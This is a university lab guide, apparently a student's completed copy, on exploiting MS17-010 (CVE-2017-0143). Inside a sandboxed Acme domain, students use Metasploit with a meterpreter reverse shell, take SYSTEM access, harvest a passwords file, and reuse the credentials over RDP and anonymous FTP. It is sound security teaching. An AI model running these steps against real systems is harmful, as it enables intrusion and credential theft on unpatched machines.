Identifying and Exploiting Vulnerabilities (3e)

Managing Risk in Information Systems, Third Edition - Lab 01

Before You Begin – ANISHA ASAD

Welcome! JBL Cloud Labs are your opportunity to gain valuable hands-on experience with
professional-grade tools and techniques as you work through the lab exercises provided in the
onscreen lab guide. The use of virtualization enables you to perform all of the tasks in the lab guide in
a live environment without putting your personal device or institution's assets at risk.

Before you begin the guided lab exercises, please review the following preparation checklist.

1. Run the System Checker. The System Checker will confirm that your browser and network
connection are ready to support virtual labs.

2. Review the Common Lab Tasks document. This document provides an overview of the virtual
lab environment and outlines several of the recurring tasks found in the lab exercises.

3. When you've finished, use the Disconnect button to end your session and create a
StateSave. To end your lab session and save your work, click the Disconnect button in the
upper-right corner of the Lab View toolbar. When prompted, assign a name for your StateSave
(we recommend using the Section, Part, and Step number where you stopped) and click
Continue. Please note that a StateSave will preserve any changes written to disk in your lab
session. A StateSave will not preserve the execution state, including open windows and active
processes - similar to restarting your computer.
If you close your browser window without disconnecting, your lab session will automatically
end after 5 minutes.

4. Technical Support is here to help! Our technical support team is available 24/7 to help
troubleshoot common issues.
Please note that the 24/7 support team is Level 1 only, and cannot assist with questions about
lab content or the array of software used in the labs. If you believe you’ve identified an error in
the lab guide or a problem with the lab environment, your ticket will be escalated to the Jones
& Bartlett Learning product team for review. In the meantime, we recommend resetting the lab
(Options > Reset Lab) or reaching out to your instructor for assistance.

Introduction
A vulnerability may be defined as a weakness in an asset within an IT infrastructure or—more broadly
—a flaw in any system or business process that can be exploited. Vulnerabilities exist passively in an
asset or asset group until they has been patched by a security professional or exploited by a hacker.

Page 1 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Every asset type—including software, networks, computers, humans, physical perimeters, etc.—
contains vulnerabilities of some kind.

In many ways, the security industry is driven by vulnerabilities. Countless security products, methods,
and services have been built as solutions to managing vulnerabilities in services and assets. In an
ideal world, a threat would be unable to exploit an asset that does not contain or present a
vulnerability. However, as a security professional, you must assume that every asset will have
vulnerabilities in some form and that no system can ever be 100% secure.

In contrast to the passive nature of vulnerabilities, threats are active agents that attempt to discover
and exploit vulnerabilities. Understanding the relationship between threats and vulnerabilities is
essential to mitigating risks. Risk analysis may be defined as the process of systematically evaluating
the features of threats (such as capabilities, motivations, types) and vulnerabilities (such as severity).
The features of threats and vulnerabilities help security professionals to estimate the likelihood and
impact values of exploitation. Likelihood and impact values are key metrics that help companies
assess risk.

In this lab, you will identify and exploit vulnerabilities in the IT assets of a fictional company, the Acme
Corporation. You can find vulnerabilities in many places, including operating systems and business
processes. In other words, you can find both technical and non-technical vulnerabilities. From a
technical perspective, an exploit is a software, data, or a sequence of commands that take advantage
of a vulnerability and result in unintended behavior on the target software. By comparison, exploitation
of a vulnerability in a business process or human can occur in a very “social” way, such as via a social
engineering attack. In this lab, you will explore both the passive nature of vulnerabilities and the
dynamic nature of a threat agent performing exploitation. You will assume the role of a system
administrator auditing an IT infrastructure, a process that mirrors that of a threat agent attempting to
exploit and gain unauthorized access to the system.

Lab Overview
This lab has four parts, which should be completed in the order specified.

1. In the first part of the lab, you will identify the version and build of a Windows system.

2. In the second part of the lab, you will research and identify a vulnerability in the version
andbuild of Windows you identified. You will also confirm the availability of the exploit code.
3. In the third part of the lab, you will use the Metasploit Framework on Kali Linux to exploit
thevulnerability.

Page 2 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

4. In the fourth part of the lab, you will perform a file search on the exploited machine to
locateinformation that may allow you to further extend the scope of your attack.

Finally, if assigned by your instructor, you will complete a series of challenge exercises that allow you
to use the skills you learned in the lab to conduct independent, unguided work—similar to what you
will encounter in a real-world situation.

Learning Objectives
Upon completing this lab, you will be able to:

1. Describe threats, vulnerabilities, and exploits.

2. Practice different methods for identifying vulnerabilities.

3. Research vulnerabilities and exploits on different platforms.

4. Practice different methods for exploiting vulnerabilities.

5. Expand the scope of an attack by extracting sensitive information from an exploited system.

Topology
This lab contains the following virtual machines. Please refer to the network topology diagram below.

vWorkstation (Windows Server 2019)

TargetWindows01 (Windows Server 2019)

Kali (Kali Linux)

Page 3 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Tools and Software

The following software and/or utilities are required to complete this lab. Students are encouraged to
explore the Internet to learn more about the products and tools used in this lab.

Metasploit Framework
FileZilla

Deliverables
Upon completion of this lab, you are required to provide the following deliverables to your instructor:

1. Lab Report file, including screen captures of the following:

About Windows dialog box and the Windows version number

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows
Code Execution module in the Rapid7 Vulnerability and Exploit Database
Current user on the TargetWindows01 server
TargetWindows01 Desktop and the yourname_was_here folder
Contents of the password.txt file
Contents of the file containing sensitive information

Page 4 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Contents of the discovered file

Challenge: Contents of the file containing sensitive information

2. Any additional information as directed by the lab:

Challenge: What are some root causes of storing personal information in clear text
files? Challenge: What are some root causes of using an FTP service on the internal
network?
Challenge: What are some root causes of having anonymous login enabled on FTP service?

Page 5 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Guided Exercises
Note: In this section of the lab, you will follow a step-by-step walk-through of the objectives for this lab
to produce the expected deliverable(s).

1. Review the Common Lab Tasks document.

Frequently performed tasks, such as making screen captures and downloading your Lab
Report, are explained in the Common Lab Tasks document. You should review these tasks
before starting the lab.

2. Proceed with Part 1.

Part 1: Identify the Version and Build of a Windows System

Note: In this lab, you will interact with two critical systems at the Acme Corporation: the vWorkstation
and TargetWindows01. The vWorkstation is a client machine of the Acme Corporation and a member
computers of the acme.com domain. TargetWindows01 is the domain controller for the acme.com
domain. A domain controller is responsible for storing all user and computer accounts in a Windows
domain, as well as the authentication and authorization of those users and computers and the
management of domain-wide security policies. Therefore, a domain controller is the heart and brain of
a Windows domain. In this part of the lab, you will identify the exact version of the Windows Server
2016 operating system running on the TargetWindows01 machine.

Each Microsoft Windows operating system has a well-known name—for example, Server 2016,
Windows 10 XP, Vista, etc. However, behind these names are actual Windows version numbers. More
specific than a version number, Windows operating systems also have “build numbers,” which identify
the major updates that have been applied to that Windows version. Attackers and defenders can use
this information to search for vulnerabilities specific to a given Windows operating system.

In practice, there are many different methods of identifying vulnerabilities on a given system. The most
common way is to perform a vulnerability scan against the target. Vulnerability scanning is considered
a black-box testing method because it identifies vulnerabilities from an external point of view and
without checking the internal structures of the target system. Both attackers and security professionals
can practice vulnerability scanning. However, professional hackers do not usually use scanners, which
generate a lot of “noise,” including log generation on the target.

In this part of the lab, think of yourself as a system administrator. You will not be using a vulnerability
scanner to discover vulnerabilities. Instead, you will identify vulnerabilities by determining the version
of the target system’s operating system and then initiating a well-crafted search against a vulnerability
database.

Page 6 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

You will begin the lab on the vWorkstation machine (172.30.0.2). Administrator credentials are
provided below for reference.

Username: Administrator
Password: P@ssw0rd!

1. On the Lab View toolbar, select TargetWindows01 from the Virtual Machine menu to connect
to the TargetWindows01 domain controller.

Select TargetWindows01

2. From the TargetWindows01 taskbar, click the Start button, then type winver and press
Enter to open the About Windows dialog box.

Page 7 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Winver command

Note: This dialog box contains essential information about the current Windows installation, including
the version and build numbers. Confirm that the Windows version number is 1607 and the build
number is 14393.0. If you check this version and build number against the information at the Microsoft
product page at https://docs.microsoft.com/en-us/windows/release-information/, you will see that build
number 14393.0 dates back to August 2016. This means that the Windows Server 2016 operating

Page 8 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

system running on TargetWindows01 has not been updated since that date. You can assume that this
version will have many security vulnerabilities, including some that can be remotely exploited without
any user interaction.

3. Make a screen capture showing the About Windows dialog box and the Windows version
number.

4. Click OK to close the dialog box.

Part 2: Research and Identify Vulnerabilities and Exploits

Note: One of the best resources for researching vulnerabilities is the Common Vulnerabilities and
Exposures (CVE) database. The CVE database is maintained by a non-profit organization called The
MITRE Corporation. According to the CVE website:

[The CVE database is] a dictionary that provides definitions for publicly disclosed cybersecurity
vulnerabilities and exposures. The goal of the CVE is to make it easier to share data across separate
vulnerability capabilities (tools, databases, and services) with these definitions. CVE Entries are
comprised of an identification number, a description, and at least one public reference.
(https://cve.mitre.org/about/faqs.html)

Page 9 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Every vulnerability discovered in a software product is assigned a unique CVE number. The format of
the CVE number is CVE-year-number, where year is the year the vulnerability was first discovered
and number is a numeric value of at least four digits.

Each vulnerability is also associated with a CVSS score. The Common Vulnerability Scoring System
(CVSS) is used to calculate and assign a numerical severity value to CVEs by taking base, temporal,
and environmental characteristics of the vulnerability into account. A CVSS score can be between 0
(the lowest severity) and 10 (the highest severity). You can think of 0 as the condition where there is
no vulnerability. Vulnerabilities with low CVSS scores, such as 1, 2, or 3, usually do not impact
confidentiality, integrity, and availability too much. These kinds of vulnerabilities also require physical
access to be exploited. The attack complexity of low-severity vulnerabilities is usually high. They
require user interaction on the target's systems; for example, the victim must open the e-mail sent by
the attacker. Last but not least, vulnerabilities with low severity levels usually require some prior
privilege on the target systems.

The characteristics of vulnerabilities with low CVSS scores are entirely opposite to those of
vulnerabilities with high severity levels. High-severity vulnerabilities have significant impacts on
confidentiality, integrity, and availability, and do not require physical presence or user interaction.
Attack complexities are usually low, meaning that an attacker can quickly develop an exploit. These
extremely dangerous vulnerabilities do not require any prior privilege on the target system, meaning
that an attacker can exploit the vulnerability and infiltrate into the systems without any previous rights
such as guest account password, user account credentials, etc.

In this part of the lab, you will use the Common Vulnerabilities and Exposures (CVE) database to
research and identify vulnerabilities in the version and build of Windows Server 2016 that you just
identified on your domain controller.

1. On the Lab View toolbar, select vWorkstation from the Virtual Machine menu to return to your
primary workstation.

2. On the vWorkstation desktop, double-click the Chrome icon to open a new browser window.

Chrome icon

Page 10 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

3. In the browser navigation bar, type http://cve.mitre.org and press Enter to navigate to
the Common Vulnerabilities and Exposures database.

CVE database

4. On the CVE page’s navigation bar, click the Search CVE List link to open the Search CVE
List page.

Page 11 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Search CVE List

5. On the Search CVE List page, type Windows 1607 remote code execution in the
Search field, then click Submit to search for vulnerabilities related to Windows Server 2016.

Please note that you used "1607" in the search, the version number of Windows Server 2016.

Page 12 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Run a search

6. Review the search results.

Note the number of total vulnerabilities. CVEs are sorted according to the release dates in
descending order. Note the year portion of the code of the first CVE at the bottom of the list,
which is the same year as the release year of Windows Server 2016.

Page 13 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Search results

7. In the search results, locate the entry for CVE-2017-0143.

This is the vulnerability that you will exploit in Part 3 using the Metasploit Framework.

Page 14 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

CVE-2017-0143

8. Click the CVE-2017-0143 link to view more information about this vulnerability.

9. Review the Description section of the CVE-2017-0143 page.

The Description should confirm that Windows Server 2016 is affected by this vulnerability.

Page 15 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

CVE-2017-0143 Description

10. At the top of the CVE page, click the Learn more at National Vulnerability Database (NVD)
link.

This will forward you to the vulnerability page at the NVD site. The National Vulnerability
Database is another vulnerability database maintained by the U.S. government. NVD staff
perform analysis on CVEs and provide more information about CVEs, including the CVSS
score.

Page 16 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

NVD webpage

11. On the NVD page for CVE-2017-0143, locate the Base Score of CVE-2017-0143 in the
Severity section of the page.

8.1 considered is a high value.

Page 17 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Base Score

12. On the right-hand side, position your cursor over the Vector value.

A pop-up window will show additional characteristics of the vulnerability, including Attack
Vector; Attack Complexity; Privileges Required; User Interaction; and Impacts on
Confidentiality, Integrity, and Availability.

Page 18 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Additional characteristics

13. Make a screen capture showing the NVD page for CVE-2017-0143, including the Base
Score.

Page 19 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Note: In the next steps, you will review one additional repository of important information about
vulnerabilities: the Microsoft Security Bulletin. Similar to the CVE database, but restricted to Microsoft
products, Microsoft maintains its own records of vulnerabilities discovered in its software. Microsoft
also assigns its own unique identifiers, which are commonly used in tools like the Metasploit
Framework to identify vulnerabilities and exploits.

14. In the browser navigation bar, type Microsoft Security Bulletin CVE-2017-0143
and press Enter to run a Google search.

Run a Google search

15. From the search results, click the Microsoft webpage titled Microsoft Security Bulletin
MS17-010 - Critical | Microsoft Docs.

Page 20 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

At the time of writing, this page appeared as the first result. However, the order of the search
results may change over time. If you do not see this page as the first result, you should be
able to locate it within the first ten search results.

Search results

16. Review the Microsoft Security Bulletin page to confirm that Microsoft Security Bulletin Number
MS17-010 has been prepared for CVE-2017-0143.

Note that MS17-010 also references several additional CVE numbers. It is not uncommon for a
single Microsoft Security Bulletin to encompass several vulnerabilities associated with the
same root cause.

Page 21 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Microsoft Security Bulletin

Note: From this point onward, you can begin to think of yourself as an attacker, white-hat hacker, or
penetration tester. In the next steps, you will check whether the Metasploit Framework has an exploit
for CVE-2017-0143 or MS17-010. The Metasploit Framework is an open-source penetration testing
tool that contains more than 3000 exploits (and counting). It is a very sophisticated tool that can be
used both by security professionals and cybercriminals. Metasploit hosts not only exploits but also
shellcode—pieces of post-exploitation code that help penetration testers and hackers to perform further
actions on the target after exploitation. The Metasploit Framework is the best-known component of the
Metasploit project, which is now owned by security company Rapid7. In the next steps, you will use
Rapid7’s vulnerability and exploit database to look up Metasploit exploits for CVE-2017-0143.
However, because the Metasploit Framework commonly uses Microsoft Bulletin Numbers to tag
exploits related to Microsoft products, you will use MS17-010 as your search term.

17. In the browser navigation bar, type https://www.rapid7.com/db/ and press Enter to
navigate to the vulnerability and exploit database maintained by Rapid7.

Page 22 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Rapid7 Vulnerability and Exploit Database

18. On the Vulnerability & Exploit Database page, type MS17-010 in the Search box and select
Module from the Type menu, then press Enter to search for modules related to MS17-010.

Page 23 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Run a search

Note: The Metasploit Framework uses modules to exploit a target. In addition to the exploit modules,
there are other kind of modules that perform tasks such as scanning and post-exploitation. Your
search results should include five modules related to MS17-010 and—by extension—CVE-2017-0143.

19. From the search results, click the MS17-010

EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command
Execution module.

Page 24 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Search results

20. On the module page, review the Description and Module Options.

You will use some of the commands listed under Module Options when you use the Metasploit
Framework in Part 3.

Page 25 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Module Description

21. Make a screen capture showing the MS17-010

EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code
Execution module in the Rapid7 Vulnerability and Exploit Database.

Page 26 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Note: This concludes your vulnerability and exploit research. In Part 3, you will exploit the vulnerability
and open a remote shell on TargetWindows01.

Part 3: Use the Metasploit Framework to Exploit a Vulnerability

Note: In Part 2 of this lab, you identified a remotely exploitable vulnerability in the version of Windows
Server 2016 installed on TargetWindows01. You also confirmed that this vulnerability
(CVE-2017-0143) is bundled with exploit codes. You will now exploit this vulnerability using the
Metasploit Framework on the Kali machine and open a remote shell on the target machine. The Kali
machine in this lab environment can be considered an attacker who was able to access the acme.com
network in some way. Alternatively, Kali may also be considered an auditing system managed by the
ACME security team.

Kali Linux is a special Linux distribution designed for security professionals and penetration testers. It
has more than 350 tools for different purposes, including but not limited to vulnerability scanning,
reverse engineering, exploitation, digital forensics, web application attacks, and wireless security. Kali
Linux is free and maintained by a company called Offensive Security.

The Metasploit Framework is one of the tools that comes installed on Kali Linux. In this part of the lab,
you will use Metasploit to exploit the vulnerability and to open a remote shell on the target system after
exploitation. A shell is an essential method of performing post-exploitation actions on the target
system. As with legitimate remote shells such as SSH and telnet, a remote shell enables an attacker
to execute commands on the remote system as if they had accessed the computer locally.

1. On the Lab View toolbar, select Kali from the Virtual Machine menu to connect to the Kali
virtual machine.

2. At the Kali login screen, type root in the Username field and press Enter.

Page 27 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Username

3. When prompted, type toor in the Password field and press Enter.

You have now signed in as the root user.

Password

Page 28 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

4. From the menu bar, click the Activities menu, then click the Terminal icon to open a new
terminal window.

Open a terminal window

5. At the command prompt, type msfconsole and press Enter to start Metasploit from the
command line console.

Start Metasploit

6. When the msf5 > prompt appears, type use exploit/windows/smb/ms17_010_psexec

and press Enter.

This command is used to select the exploit module to be used.

Page 29 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Select the exploit module

7. At the msf5 prompt, type set rhosts 172.30.0.3 and press Enter.

This command sets the remote host we want to exploit. In this example, it is TargetWindows01
(Windows Server 2016).

Set remote host

8. At the msf5 prompt, type set payload windows/meterpreter/reverse_tcp and

Page 30 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

press Enter.

This command determines the payload, which is executed right after successful exploitation.
Meterpreter is the built-in Metasploit payload for stealthy, powerful, and extensible command
and control activities. Meterpreter payloads are used by both attackers and security
researchers to access target computer and execute code on it by the help of a shell.

Set the payload

9. At the msf5 prompt, type set lhost 172.30.0.4 and press Enter.

This command specifies the local IP address that will be ready for connections on the
attacker's computer.

Set local host

10. At the msf5 prompt, type set lport 443 and press Enter.

This command sets the local port that will be ready for connections on the attacker's computer.
After the exploit is executed, the payload code will let TargetWindows01 connect to the
attacker's machine by using this port.

Page 31 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Set local port

11. At the msf5 prompt, type exploit and press Enter.

This command sends the exploit module to the target system.

Begin exploit

12. At the meterpreter prompt, type shell and press Enter.

This command allows us to use cmd.exe over meterpreter, meaning that you have now
opened a remote shell on TargetWindows01 with the System account. Please note that you
didn’t need a username or password to do this.

Page 32 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Open a remote shell

Note: The System account is a privileged internal account that exists on every Windows computer.
This account is used by the operating system and by services that run under Windows. It is an internal
account that does not show up in the User Manager. By default, the System account is granted Full
Control permissions to all files. Here, the system account has the same functional rights and
permissions as the Administrator account.

You can think of this terminal window as a CMD shell opened on TargetWindows01. You can perform
almost every malicious action within this window, including view, delete, change, and create files;
install programs such as rootkits; infect the computer with a virus; create a user account; delete a user
account; and shut down the computer.

Now, think about the effects of this exploitation, the potential impact on confidentiality, integrity, and
availability on the target machine. Also, remember that the CVSS score of the vulnerability was high.
Did you require physical access to Windows Server 2016? Did you need a user interaction at the
target system? Did you have prior privilege on the target system? The answers to all of these
questions are No.

At this point, you should think about how critical it is to patch systems as quickly as possible,
especially after the announcement of the vulnerabilities with high severity levels. Vulnerabilities with
high CVSS scores usually end up with high risk levels for companies. Think about different
vulnerabilities on the target system. CVE-2017-0143 itself is a vulnerability that exists in the target
machine. The lack of patch management procedures might be just another vulnerability, but they can
also be thought of as the root cause. Consider that the attacker's machine (Kali Linux) has direct
access to the target machine; the lack of a firewall between the domain controller and the untrusted
network can be regarded as yet another vulnerability. All of these vulnerabilities are considered in the
risk management process.

Exploitation is the action of the threat. After successful exploitation, we don't talk about risk, risk
assessment, and risk analysis any more, as these concepts are used to measure the potential harm
caused by a threat. After the exploitation, we will have real harm that requires incident response
procedures.

13. At the remote shell prompt, type whoami and press Enter to see the current user on the
TargetWindows01 server.

Page 33 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

See the current user

14. Make a screen capture showing the current user on the TargetWindows01 server.

15. At the remote shell prompt, type cd /Users/Administrator/Desktop and press Enter
to change the current directory to the Administrator’s Desktop.

Change directory

Page 34 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

16. At the remote shell prompt, type md yourname_was_here and press Enter, replacing
yourname with your first name, to create a new directory on the Desktop.

Create a new directory

17. On the Lab View toolbar, select TargetWindows01 from the Virtual Machine menu to connect
to the TargetWindows01 virtual machine.

18. Make a screen capture showing the TargetWindows01 Desktop and the
yourname_was_here folder.

Part 4: Retrieve Sensitive Files

Note: In Part 3 of this lab, you exploited a vulnerability on a remote server and you were able to
access the machine over a remote shell. However, an attacker will rarely stop there. With privileged
system access, an attacker is likely to perform further searches on the compromised computer.

Page 35 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

In this part of the lab, you will perform a file search on the exploited machine to locate information that
may allow you to further extend the scope of your attack.

1. On the Lab View toolbar, select Kali from the Virtual Machine menu to connect to the Kali
virtual machine.

2. At the command prompt, type cd / and press Enter to change your current directory to the
root directory.

Change directory

3. At the command prompt, type dir /s passwords* and press Enter to display all files
containing the word password within the current directory and subdirectories.

Your search should return a file named passwords.txt, which seems like it could contain
something of interest.

Page 36 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

File search

Note: Unfortunately, it is all too common for employees to keep lists of important passwords on their
workstations. If an attacker is able to exploit a vulnerable system, they may use a similar command to
search the file system for information—such as user credentials—that will allow them to extend their
reach into other systems on the network.

4. At the command prompt, type cd C:/Users/Administrator/Documents and press

Enter to change your current directory to the location of the password.txt file.

Change directory

Page 37 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

5. At the command prompt, type type passwords.txt and press Enter to display the
contents of the file.

6. Make a screen capture showing the contents of the password.txt file.

7. At the command prompt, type exit and press Enter three times to close the remote shell,
meterpreter, and Metasploit.

Note: As an attacker, you now have in hand a list of user credentials from the exploited machine. In
the next steps, you will use that information to attempt to access other computers on the network. You
will access the vWorkstation using a remote desktop (RDP) connection from the Kali machine.

8. At the command prompt, type rdesktop 172.30.0.2 and press Enter to open an RDP
connection to the vWorkstation.

RDP command

Page 38 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

9. When prompted, type yes and press Enter to continue.

The vWorkstation log-in screen will appear in a new rdesktop window.

vWorkstation log-in

10. In the rdesktop window, log in using the first set of credentials you found in in the
passwords.txt file.

Hint: You will need to use the prefix ACME\ before the username to ensure you are logging in
as a domain user.

Page 39 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

11. On the vWorkstation, search common user folders to locate another file containing
sensitive information.

12. Make a screen capture showing the contents of the file containing sensitive
information.

Note: In this part of the lab, you identified a different sort of vulnerability—storing sensitive information
in unencrypted files. However, when performing risk analysis, you should always consider the root
cause of the vulnerability. CVE-2017-0143 was a technical vulnerability that existed within the
operating system, but the absence or failure of patch management procedures may be considered the
root cause of CVE-2017-0143 being successfully exploited by an attacker. Think of some possible root
causes of a user storing passwords and financial information in cleartext. For example, this may be
considered the result of poor employee security training. What about the length and complexity of the
passwords in the text file? This is a clear indication of a lack of effective password policies.

Page 40 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

Challenge Exercises
Note: The following exercises are provided to allow independent, unguided work using the skills you
learned earlier in this lab—similar to what you would encounter in a real-world situation.
In a real-world setting, you will not always need to use sophisticated tools like Metasploit Framework
to exploit vulnerabilities. You applied this in Part 4 by searching for critical information within servers
and client computers. In this section of the lab, you will perform a similar task. Your goal is to locate
critical personal information stored on TargetWindows01.

Part 1: Use FTP to Extract Sensitive Information

FTP stands for File Transfer Protocol. It is one of the oldest protocols, but is still used by companies to
share files. It is common to see "anonymous" login enabled in FTP servers.

Acme company is one of those organizations that still uses legacy services like FTP. Suppose a
human resources employee at Acme company recently used the FTP service to transfer a file to their
computer, but forgot to delete the file from the FTP folder.

As an attacker, log in anonymously to the FTP service on TargetWindows01 from the vWorkstation
machine. Next, examine commonly used User folders to locate the critical file. Once you have located
the file, transfer it to the vWorkstation, then open the file and reviews its contents.

Make a screen capture showing the contents of the file containing sensitive information.

Part 2: Identify Root Causes

As an attacker, you were able connect to a legacy Internet protocol and locate a file with sensitive
information. Think about the root cause or root causes of this problem, then answer the following
questions:

What are some root causes of storing personal information in clear text files? People often
store personal information in clear text files due to forgetfulness or a lack of awareness about
security risks. Without proper education from a cybersecurity expert, they may not realize the
dangers. Encryption, while a best practice, can feel complicated, slow, and expensive, leading

Page 41 of 42
Identifying and Exploiting Vulnerabilities (3e)
Managing Risk in Information Systems, Third Edition - Lab 01

many to prioritize convenience over security. Some consciously choose to skip encryption,
believing the effort isn’t worth the hassle. Lastly, the “It won’t happen to me” mindset plays a big
role—many assume they won’t be targeted, so they neglect basic security measures.
Unfortunately, these habits leave sensitive data vulnerable to breaches, making it crucial to
prioritize security, even when it feels inconvenient.

What are some root causes of using an FTP service on the internal network? Many use FTP on
internal networks due to the belief that “It won’t happen to me,” assuming security risks are
minimal. A lack of education also plays a role—some may not fully understand what FTP does or
that more secure, equally user-friendly alternatives exist. Others consciously choose FTP
because it has been around for decades, is widely compatible, and feels reliable. While it may
seem like a safe choice, FTP lacks encryption and leaves data vulnerable to interception.
Relying on outdated technology for convenience can create unnecessary security risks, making
it essential to explore modern, more secure file transfer solutions.

What are some root causes of having anonymous login enabled on FTP service? Anonymous
login on an FTP service is often enabled for convenience, especially if the system doesn’t store
sensitive data. In such cases, users may see little risk and prioritize ease of access over
security. Another common reason is simply forgetting to disable it or not realizing it can be
turned off. Many users may not be aware of the security risks or assume their setup isn’t a
target. However, leaving anonymous login enabled can expose systems to unauthorized access,
making it important to review and adjust security settings, even when the perceived risk seems
low.

Page 42 of 42